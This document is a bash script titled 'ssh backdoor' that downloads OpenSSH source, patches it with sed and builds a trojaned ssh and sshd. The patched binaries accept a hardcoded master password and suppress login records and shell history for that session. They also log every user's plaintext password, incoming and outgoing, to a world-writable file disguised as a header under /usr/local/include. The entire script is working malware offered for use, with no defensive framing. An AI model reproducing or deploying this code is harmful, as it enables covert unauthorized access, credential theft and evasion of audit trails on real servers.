ssh backdoor

#!/bin/bash
PASSWORD=$1
SNIFFILE=$2

BACKDOOR_INC="patch.h"
FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"
HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"
OK="done"
FAIL="fail"

echo "ENJOY..."
if [ -z $PASSWORD ]; then
        echo -n ">>> password: "
        read PASSWORD|md5sum
fi

if [ -z $SNIFFILE ]; then
echo -n ">>> logfile path: /usr/local/include/uconf.h"
SNIFFILE="/usr/local/include/uconf.h"
touch "/usr/local/include/uconf.h"
chmod o+wr "/usr/local/include/uconf.h"
echo "Do not remove /usr/local/include/uconf.h"
fi

echo -n "checking for sshd_config...    "
SSHDCONFIG="/etc/ssh"
if [ -f $SSHDCONFIG/sshd_config ]; then
        echo "$OK  ($SSHDCONFIG)"
fi

if [ -z "$SSHDCONFIG" ]; then
        echo "$FAIL"
        echo -n ">>> sshd_config path: "
        read SSHDCONFIG
fi

# ssh
echo -n "checking for OpenSSH binary... "
SSH=$(which ssh)
if [ -z "$SSH" ]; then
        echo "$FAIL"
        exit
fi
echo "$OK  ($SSH)"

# wget
echo -n "checking for wget/curl binary... "
WGET=$(which curl)
WGET_FLAG="-O"
if [ -z "$WGET" ]; then
        WGET=$(which wget)
        if [ -z "$WGET" ]; then
                echo "$FAIL"
                exit
        else
                WGET_FLAG="-qc"
        fi
fi
echo "   $OK  ($WGET)"

# check ssh version
echo -n "checking OpenSSH version... "
SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/')
SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}')
SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//')
if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then
        echo $FAIL;
        exit
fi
echo "   $OK  ($SSH_VERSION)"


# get ssh
OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)
echo "downloading source..."
$WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&
#echo "          $OK" &&
echo -n "extracting tarball..." &&
tar xzf $OPENSSH.tar.gz &&
echo "          $OK" &&
cd $OPENSSH


# check file sanity
echo -n "checking file sanity..."
for FILE in $FILES; do
        if [ ! -f $FILE ];then
                printf "$FILE not found.\n"
                exit
        fi
        cp $FILE $FILE.bak
done
echo "        $OK"

echo "generating patches..."
BACKDOOR_BUF=\
"#ifndef __HAVE_PATCH_H
#define __HAVE_PATCH_H
#define PATCHPASS \"$PASSWORD\"
#define SNFLOG \"$SNIFFILE\"
int patch_on;
#endif"
printf "$BACKDOOR_BUF" > $BACKDOOR_INC


# patch files
echo "  patching auth.c...           $OK"
sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp
echo "  patching loginrec.c...       $OK"
sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp
echo "  patching auth-passwd.c...    $OK"
sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp
echo " patching session.c...             $OK"
sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp
echo "  patching sshconnect1.c...    $OK"
sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp
echo "  patching sshconnect2.c...    $OK"
LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1)
sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp
echo "  patching includes.h...    $OK"
sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp


# move files
for FILE in $FILES; do
        mv $FILE.tmp $FILE
done
echo "done."
echo "building source..."

echo
echo Variables:
echo " \$SSH_VERSION  =  $SSH_VERSION"
echo " \$SSHDCONFIG   = $SSHDCONFIG"
echo " \$PASSWORD     = $PASSWORD"

SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}')
if [ -z $SSH_DISTRO ]; then
echo "Keeping current version.h"
else
echo "SSH Distro: $SSH_DISTRO"
sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp
rm -rf version.h
mv version.h.tmp version.h
fi

# start build
cat /etc/ssh/sshd_config|grep -i usepam
echo 'Configure using PAM (leave blank if yes): '
read USEPAM
cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials
echo 'Configure using kerb5 (leave blank if yes): '
read KERB
if [ -z $USEPAM ];then
echo "Configuring --with-pam"
OPT_PAM="--with-pam"
else
echo "Configuring without PAM"
OPT_PAM=""
fi
if [ -z $KERB ]; then
echo "Configuring --with-kerberos5"
OPT_KERB="--with-kerberos5"
else
echo "Configuring without kerb5"
OPT_KERB=""
fi
echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"
./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd

printf "patched OpenSSH ready.\n"